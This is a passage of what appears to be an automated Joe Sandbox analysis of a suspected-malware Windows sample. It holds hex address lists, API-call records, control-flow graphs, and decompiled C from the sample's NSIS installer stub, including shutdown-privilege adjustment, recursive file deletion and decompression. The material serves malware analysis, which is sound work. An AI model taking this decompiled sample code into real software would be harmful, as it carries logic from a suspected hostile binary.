                                                          0x004036bc
                                                          0x004036be
                                                          0x004036c6
                                                          0x004036c6
                                                          0x004036d1
                                                          0x004036d3
                                                          0x004036d3
                                                          0x004036e8
                                                          0x0040370d
                                                          0x0040371b
                                                          0x0040371e
                                                          0x00403725
                                                          0x0040372c
                                                          0x0040372c
                                                          0x00403725
                                                          0x0040372e
                                                          0x00403733
                                                          0x00403734
                                                          0x00403740
                                                          0x00403744
                                                          0x0040374b
                                                          0x00403759
                                                          0x0040375e
                                                          0x00403765
                                                          0x00403769
                                                          0x0040376d
                                                          0x0040376f
                                                          0x0040376f
                                                          0x0040376d
                                                          0x00403776
                                                          0x0040377d
                                                          0x00403783
                                                          0x0040379b
                                                          0x004037ab
                                                          0x004037b0
                                                          0x004037b6
                                                          0x004037bd
                                                          0x004037c4
                                                          0x004037c6
                                                          0x004037c7
                                                          0x004037d1
                                                          0x004037d8
                                                          0x004037da
                                                          0x004037dc
                                                          0x004037dc
                                                          0x004037ef
                                                          0x004037f1
                                                          0x004038eb
                                                          0x004038eb
                                                          0x004038ee
                                                          0x004038f1
                                                          0x00000000
                                                          0x00000000
                                                          0x004037fb
                                                          0x004037fc
                                                          0x004037ff
                                                          0x00403808
                                                          0x00403808
                                                          0x0040380b
                                                          0x0040380e
                                                          0x00403811
                                                          0x00403814
                                                          0x00403814
                                                          0x00403814
                                                          0x00403815
                                                          0x00403819
                                                          0x004038d9
                                                          0x004038e2
                                                          0x004038e4
                                                          0x004038e7
                                                          0x004038ea
                                                          0x004038ea
                                                          0x004038ea
                                                          0x00000000
                                                          0x0040381f
                                                          0x00403820
                                                          0x00403821
                                                          0x00403825
                                                          0x0040383f
                                                          0x00403846
                                                          0x00403859
                                                          0x0040385a
                                                          0x0040386f
                                                          0x00403874
                                                          0x00403876
                                                          0x00403878
                                                          0x00403894
                                                          0x0040389b
                                                          0x004038ae
                                                          0x004038af
                                                          0x004038c4
                                                          0x004038ca
                                                          0x004038cc
                                                          0x004038ce
                                                          0x004038d6
                                                          0x004038d8
                                                          0x00000000
                                                          0x004038d8
                                                          0x004038d2
                                                          0x004038d4
                                                          0x004038f9
                                                          0x004038fd
                                                          0x00403906
                                                          0x0040390b
                                                          0x00403911
                                                          0x0040391c
                                                          0x0040391e
                                                          0x00403923
                                                          0x00403925
                                                          0x0040397d
                                                          0x00403982
                                                          0x0040398b
                                                          0x00403992
                                                          0x00403995
                                                          0x00403b6c
                                                          0x00403b6c
                                                          0x00403b71
                                                          0x00403b7a
                                                          0x00403b97
                                                          0x00403c0f
                                                          0x00403c0f
                                                          0x00403c17
                                                          0x00403c19
                                                          0x00403c19
                                                          0x00403c1f
                                                          0x00403c1f
                                                          0x00403bae
                                                          0x00403bba
                                                          0x00403bcb
                                                          0x00403bd2
                                                          0x00403bd9
                                                          0x00403bd9
                                                          0x00403be1
                                                          0x00403bed
                                                          0x00403bfb
                                                          0x00403c06
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403bef
                                                          0x00403bef
                                                          0x00403bf0
                                                          0x00403bf2
                                                          0x00403bf3
                                                          0x00403bf4
                                                          0x00403bf9
                                                          0x00403c08
                                                          0x00403c0a
                                                          0x00000000
                                                          0x00403c0a
                                                          0x00000000
                                                          0x00403bf9
                                                          0x00403bed
                                                          0x00403b84
                                                          0x00403b8b
                                                          0x00403b8b
                                                          0x004039a1
                                                          0x00403a48
                                                          0x00403a48
                                                          0x00403a54
                                                          0x00000000
                                                          0x00403a54
                                                          0x004039b2
                                                          0x004039ba
                                                          0x00403a0c
                                                          0x00403a0c
                                                          0x00403a12
                                                          0x00403a19
                                                          0x00403a67
                                                          0x00403a69
                                                          0x00403a6e
                                                          0x00403a70
                                                          0x00403a78
                                                          0x00403a78
                                                          0x00403a83
                                                          0x00403a8f
                                                          0x00403a95
                                                          0x00403a97
                                                          0x00403b6a
                                                          0x00403b6a
                                                          0x00403b6a
                                                          0x00000000
                                                          0x00403a9d
                                                          0x00403a9d
                                                          0x00403a9f
                                                          0x00403aa0
                                                          0x00403aa9
                                                          0x00403aa2
                                                          0x00403aa2
                                                          0x00403aa2
                                                          0x00403aaf
                                                          0x00403ab7
                                                          0x00403abe
                                                          0x00403ac6
                                                          0x00403ac6
                                                          0x00403ad3
                                                          0x00403adf
                                                          0x00403ae9
                                                          0x00403ae9
                                                          0x00403aeb
                                                          0x00403af2
                                                          0x00403afc
                                                          0x00403b08
                                                          0x00403b0e
                                                          0x00403b14
                                                          0x00403b17
                                                          0x00403b21
                                                          0x00403b27
                                                          0x00403b29
                                                          0x00403b2d
                                                          0x00403b3e
                                                          0x00403b44
                                                          0x00403b49
                                                          0x00403b4b
                                                          0x00403b4e
                                                          0x00403b54
                                                          0x00403b54
                                                          0x00403b4b
                                                          0x00403b29
                                                          0x00403b57
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b65
                                                          0x00000000
                                                          0x00403b65
                                                          0x00403a97
                                                          0x00403a1b
                                                          0x00403a1e
                                                          0x00403a22
                                                          0x00403a27
                                                          0x00403a29
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a35
                                                          0x00403a40
                                                          0x00403a45
                                                          0x00000000
                                                          0x00403a45
                                                          0x004039c3
                                                          0x004039db
                                                          0x004039ec
                                                          0x004039ed
                                                          0x004039f1
                                                          0x004039f3
                                                          0x00403a01
                                                          0x00403a08
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a08
                                                          0x00403a0a
                                                          0x00000000
                                                          0x00403a0a
                                                          0x0040392d
                                                          0x00403939
                                                          0x0040393e
                                                          0x00403943
                                                          0x00403945
                                                          0x00000000
                                                          0x00000000
                                                          0x0040394d
                                                          0x00403955
                                                          0x00403966
                                                          0x0040396e
                                                          0x00403970
                                                          0x00403975
                                                          0x00403977
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403977
                                                          0x00000000
                                                          0x004038d4
                                                          0x0040387d
                                                          0x0040387f
                                                          0x00000000
                                                          0x00000000
                                                          0x00403881
                                                          0x00403885
                                                          0x00403889
                                                          0x00403890
                                                          0x00403890
                                                          0x00403890
                                                          0x00403890
                                                          0x00000000
                                                          0x00403890
                                                          0x0040388b
                                                          0x0040388e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040388e
                                                          0x00403827
                                                          0x0040382b
                                                          0x0040382e
                                                          0x00403835
                                                          0x00403835
                                                          0x00000000
                                                          0x00403835
                                                          0x00403830
                                                          0x00403833
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403833
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403801
                                                          0x00403801
                                                          0x00403802
                                                          0x00403803
                                                          0x00403803
                                                          0x00000000
                                                          0x00403801
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                          • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                          • OleInitialize.OLE32(00000000), ref: 0040377D
                                                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                          • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000020,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000000), ref: 004037E9
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                            • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000000,?), ref: 00403A8F
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\xeWd55M5Lb.exe,00420F08,00000001), ref: 00403B21
                                                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                          • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                          • OleUninitialize.OLE32(?), ref: 00403B71
                                                          • ExitProcess.KERNEL32 ref: 00403B8B
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                          • ExitProcess.KERNEL32 ref: 00403C1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                          • String ID: "C:\Users\user\Desktop\xeWd55M5Lb.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xeWd55M5Lb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2292928366-2893184677
                                                          • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                          • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                          • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                          • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 394 405d74-405d9a call 40603f 397 405db3-405dba 394->397 398 405d9c-405dae DeleteFileW 394->398 400 405dbc-405dbe 397->400 401 405dcd-405ddd call 406668 397->401 399 405f30-405f34 398->399 402 405dc4-405dc7 400->402 403 405ede-405ee3 400->403 409 405dec-405ded call 405f83 401->409 410 405ddf-405dea lstrcatW 401->410 402->401 402->403 403->399 405 405ee5-405ee8 403->405 407 405ef2-405efa call 40699e 405->407 408 405eea-405ef0 405->408 407->399 418 405efc-405f10 call 405f37 call 405d2c 407->418 408->399 413 405df2-405df6 409->413 410->413 414 405e02-405e08 lstrcatW 413->414 415 405df8-405e00 413->415 417 405e0d-405e29 lstrlenW FindFirstFileW 414->417 415->414 415->417 419 405ed3-405ed7 417->419 420 405e2f-405e37 417->420 434 405f12-405f15 418->434 435 405f28-405f2b call 4056ca 418->435 419->403 425 405ed9 419->425 422 405e57-405e6b call 406668 420->422 423 405e39-405e41 420->423 436 405e82-405e8d call 405d2c 422->436 437 405e6d-405e75 422->437 426 405e43-405e4b 423->426 427 405eb6-405ec6 FindNextFileW 423->427 425->403 426->422 430 405e4d-405e55 426->430 427->420 433 405ecc-405ecd FindClose 427->433 430->422 430->427 433->419 434->408 440 405f17-405f26 call 4056ca call 406428 434->440 435->399 445 405eae-405eb1 call 4056ca 436->445 446 405e8f-405e92 436->446 437->427 441 405e77-405e80 call 405d74 437->441 440->399 441->427 445->427 449 405e94-405ea4 call 4056ca call 406428 446->449 450 405ea6-405eac 446->450 449->427 450->427
                                                          C-Code - Quality: 98%
                                                          			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				short _v556;
                                                          				short _v558;
                                                          				struct _WIN32_FIND_DATAW _v604;
                                                          				signed int _t38;
                                                          				signed int _t52;
                                                          				signed int _t55;
                                                          				signed int _t62;
                                                          				void* _t64;
                                                          				signed char _t65;
                                                          				WCHAR* _t66;
                                                          				void* _t67;
                                                          				WCHAR* _t68;
                                                          				void* _t70;
                                                          
                                                          				_t65 = _a8;
                                                          				_t68 = _a4;
                                                          				_v8 = _t65 & 0x00000004;
                                                          				_t38 = E0040603F(__eflags, _t68);
                                                          				_v12 = _t38;
                                                          				if((_t65 & 0x00000008) != 0) {
                                                          					_t62 = DeleteFileW(_t68); // executed
                                                          					asm("sbb eax, eax");
                                                          					_t64 =  ~_t62 + 1;
                                                          					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                          					return _t64;
                                                          				}
                                                          				_a4 = _t65;
                                                          				_t8 =  &_a4;
                                                          				 *_t8 = _a4 & 0x00000001;
                                                          				__eflags =  *_t8;
                                                          				if( *_t8 == 0) {
                                                          					L5:
                                                          					E00406668(0x425750, _t68);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E00405F83(_t68);
                                                          					} else {
                                                          						lstrcatW(0x425750, L"\\*.*");
                                                          					}
                                                          					__eflags =  *_t68;
                                                          					if( *_t68 != 0) {
                                                          						L10:
                                                          						lstrcatW(_t68, 0x40a014);
                                                          						L11:
                                                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                          						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                          						_t70 = _t38;
                                                          						__eflags = _t70 - 0xffffffff;
                                                          						if(_t70 == 0xffffffff) {
                                                          							L26:
                                                          							__eflags = _a4;
                                                          							if(_a4 != 0) {
                                                          								_t30 = _t66 - 2;
                                                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                          								__eflags =  *_t30;
                                                          							}
                                                          							goto L28;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          						do {
                                                          							L12:
                                                          							__eflags = _v604.cFileName - 0x2e;
                                                          							if(_v604.cFileName != 0x2e) {
                                                          								L16:
                                                          								E00406668(_t66,  &(_v604.cFileName));
                                                          								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                          								if(__eflags == 0) {
                                                          									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                          									__eflags = _t52;
                                                          									if(_t52 != 0) {
                                                          										E004056CA(0xfffffff2, _t68);
                                                          									} else {
                                                          										__eflags = _v8 - _t52;
                                                          										if(_v8 == _t52) {
                                                          											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                          										} else {
                                                          											E004056CA(0xfffffff1, _t68);
                                                          											E00406428(_t67, _t68, 0);
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                          									if(__eflags == 0) {
                                                          										E00405D74(__eflags, _t68, _a8);
                                                          									}
                                                          								}
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _v558;
                                                          							if(_v558 == 0) {
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _v558 - 0x2e;
                                                          							if(_v558 != 0x2e) {
                                                          								goto L16;
                                                          							}
                                                          							__eflags = _v556;
                                                          							if(_v556 == 0) {
                                                          								goto L24;
                                                          							}
                                                          							goto L16;
                                                          							L24:
                                                          							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                          							__eflags = _t55;
                                                          						} while (_t55 != 0);
                                                          						_t38 = FindClose(_t70); // executed
                                                          						goto L26;
                                                          					}
                                                          					__eflags =  *0x425750 - 0x5c;
                                                          					if( *0x425750 != 0x5c) {
                                                          						goto L11;
                                                          					}
                                                          					goto L10;
                                                          				} else {
                                                          					__eflags = _t38;
                                                          					if(_t38 == 0) {
                                                          						L28:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L36:
                                                          							return _t38;
                                                          						}
                                                          						__eflags = _v12;
                                                          						if(_v12 != 0) {
                                                          							_t38 = E0040699E(_t68);
                                                          							__eflags = _t38;
                                                          							if(_t38 == 0) {
                                                          								goto L36;
                                                          							}
                                                          							E00405F37(_t68);
                                                          							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                          							__eflags = _t38;
                                                          							if(_t38 != 0) {
                                                          								return E004056CA(0xffffffe5, _t68);
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 == 0) {
                                                          								goto L30;
                                                          							}
                                                          							E004056CA(0xfffffff1, _t68);
                                                          							return E00406428(_t67, _t68, 0);
                                                          						}
                                                          						L30:
                                                          						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                          						return _t38;
                                                          					}
                                                          					__eflags = _t65 & 0x00000002;
                                                          					if((_t65 & 0x00000002) == 0) {
                                                          						goto L28;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}


















                                                          0x00405d7e
                                                          0x00405d83
                                                          0x00405d8c
                                                          0x00405d8f
                                                          0x00405d97
                                                          0x00405d9a
                                                          0x00405d9d
                                                          0x00405da5
                                                          0x00405da7
                                                          0x00405da8
                                                          0x00000000
                                                          0x00405da8
                                                          0x00405db3
                                                          0x00405db6
                                                          0x00405db6
                                                          0x00405db6
                                                          0x00405dba
                                                          0x00405dcd
                                                          0x00405dd4
                                                          0x00405dd9
                                                          0x00405ddd
                                                          0x00405ded
                                                          0x00405ddf
                                                          0x00405de5
                                                          0x00405de5
                                                          0x00405df2
                                                          0x00405df6
                                                          0x00405e02
                                                          0x00405e08
                                                          0x00405e0d
                                                          0x00405e13
                                                          0x00405e1e
                                                          0x00405e24
                                                          0x00405e26
                                                          0x00405e29
                                                          0x00405ed3
                                                          0x00405ed3
                                                          0x00405ed7
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e2f
                                                          0x00405e2f
                                                          0x00405e2f
                                                          0x00405e37
                                                          0x00405e57
                                                          0x00405e5f
                                                          0x00405e64
                                                          0x00405e6b
                                                          0x00405e86
                                                          0x00405e8b
                                                          0x00405e8d
                                                          0x00405eb1
                                                          0x00405e8f
                                                          0x00405e8f
                                                          0x00405e92
                                                          0x00405ea6
                                                          0x00405e94
                                                          0x00405e97
                                                          0x00405e9f
                                                          0x00405e9f
                                                          0x00405e92
                                                          0x00405e6d
                                                          0x00405e73
                                                          0x00405e75
                                                          0x00405e7b
                                                          0x00405e7b
                                                          0x00405e75
                                                          0x00000000
                                                          0x00405e6b
                                                          0x00405e39
                                                          0x00405e41
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e43
                                                          0x00405e4b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e4d
                                                          0x00405e55
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405eb6
                                                          0x00405ebe
                                                          0x00405ec4
                                                          0x00405ec4
                                                          0x00405ecd
                                                          0x00000000
                                                          0x00405ecd
                                                          0x00405df8
                                                          0x00405e00
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dbc
                                                          0x00405dbc
                                                          0x00405dbe
                                                          0x00405ede
                                                          0x00405ee0
                                                          0x00405ee3
                                                          0x00405f34
                                                          0x00405f34
                                                          0x00405f34
                                                          0x00405ee5
                                                          0x00405ee8
                                                          0x00405ef3
                                                          0x00405ef8
                                                          0x00405efa
                                                          0x00000000
                                                          0x00000000
                                                          0x00405efd
                                                          0x00405f09
                                                          0x00405f0e
                                                          0x00405f10
                                                          0x00000000
                                                          0x00405f2b
                                                          0x00405f12
                                                          0x00405f15
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f1a
                                                          0x00000000
                                                          0x00405f21
                                                          0x00405eea
                                                          0x00405eea
                                                          0x00000000
                                                          0x00405eea
                                                          0x00405dc4
                                                          0x00405dc7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dc7

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405D9D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,\*.*), ref: 00405DE5
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,7620FAA0,7620F560,00000000), ref: 00405E0E
                                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,7620FAA0,7620F560,00000000), ref: 00405E1E
                                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                          • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*$\*.*
                                                          • API String ID: 2035342205-793820261
                                                          • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                          • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                          • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                          • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 552 406d5f-406d64 553 406dd5-406df3 552->553 554 406d66-406d95 552->554 555 4073cb-4073e0 553->555 556 406d97-406d9a 554->556 557 406d9c-406da0 554->557 558 4073e2-4073f8 555->558 559 4073fa-407410 555->559 560 406dac-406daf 556->560 561 406da2-406da6 557->561 562 406da8 557->562 563 407413-40741a 558->563 559->563 564 406db1-406dba 560->564 565 406dcd-406dd0 560->565 561->560 562->560 569 407441-40744d 563->569 570 40741c-407420 563->570 566 406dbc 564->566 567 406dbf-406dcb 564->567 568 406fa2-406fc0 565->568 566->567 571 406e35-406e63 567->571 575 406fc2-406fd6 568->575 576 406fd8-406fea 568->576 578 406be3-406bec 569->578 572 407426-40743e 570->572 573 4075cf-4075d9 570->573 579 406e65-406e7d 571->579 580 406e7f-406e99 571->580 572->569 577 4075e5-4075f8 573->577 581 406fed-406ff7 575->581 576->581 585 4075fd-407601 577->585 582 406bf2 578->582 583 4075fa 578->583 584 406e9c-406ea6 579->584 580->584 586 406ff9 581->586 587 406f9a-406fa0 581->587 589 406bf9-406bfd 582->589 590 406d39-406d5a 582->590 591 406c9e-406ca2 582->591 592 406d0e-406d12 582->592 583->585 594 406eac 584->594 595 406e1d-406e23 584->595 603 407581-40758b 586->603 604 406f7f-406f97 586->604 587->568 593 406f3e-406f48 587->593 589->577 596 406c03-406c10 589->596 590->555 605 406ca8-406cc1 591->605 606 40754e-407558 591->606 597 406d18-406d2c 592->597 598 40755d-407567 592->598 599 40758d-407597 593->599 600 406f4e-407117 593->600 611 406e02-406e1a 594->611 612 407569-407573 594->612 601 406ed6-406edc 595->601 602 406e29-406e2f 595->602 596->583 610 406c16-406c5c 596->610 613 406d2f-406d37 597->613 598->577 599->577 600->578 608 406f3a 601->608 609 406ede-406efc 601->609 602->571 602->608 603->577 604->587 615 406cc4-406cc8 605->615 606->577 608->593 616 406f14-406f26 609->616 617 406efe-406f12 609->617 618 406c84-406c86 610->618 619 406c5e-406c62 610->619 611->595 612->577 613->590 613->592 615->591 620 406cca-406cd0 615->620 623 406f29-406f33 616->623 617->623 626 406c94-406c9c 618->626 627 406c88-406c92 618->627 624 406c64-406c67 GlobalFree 619->624 625 406c6d-406c7b GlobalAlloc 619->625 621 406cd2-406cd9 620->621 622 406cfa-406d0c 620->622 628 406ce4-406cf4 GlobalAlloc 621->628 629 406cdb-406cde GlobalFree 621->629 622->613 623->601 630 406f35 623->630 624->625 625->583 631 406c81 625->631 626->615 627->626 627->627 628->583 628->622 629->628 633 407575-40757f 630->633 634 406ebb-406ed3 630->634 631->618 633->577 634->601
                                                          C-Code - Quality: 98%
                                                          			E00406D5F() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				void* _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t590;
                                                          				signed int* _t607;
                                                          				void* _t614;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t614 - 0x40) != 0) {
                                                          						 *(_t614 - 0x34) = 1;
                                                          						 *(_t614 - 0x84) = 7;
                                                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                          						L132:
                                                          						 *(_t614 - 0x54) = _t607;
                                                          						L133:
                                                          						_t531 =  *_t607;
                                                          						_t590 = _t531 & 0x0000ffff;
                                                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                          						if( *(_t614 - 0xc) >= _t565) {
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                          							 *(_t614 - 0x40) = 1;
                                                          							_t532 = _t531 - (_t531 >> 5);
                                                          							 *_t607 = _t532;
                                                          						} else {
                                                          							 *(_t614 - 0x10) = _t565;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
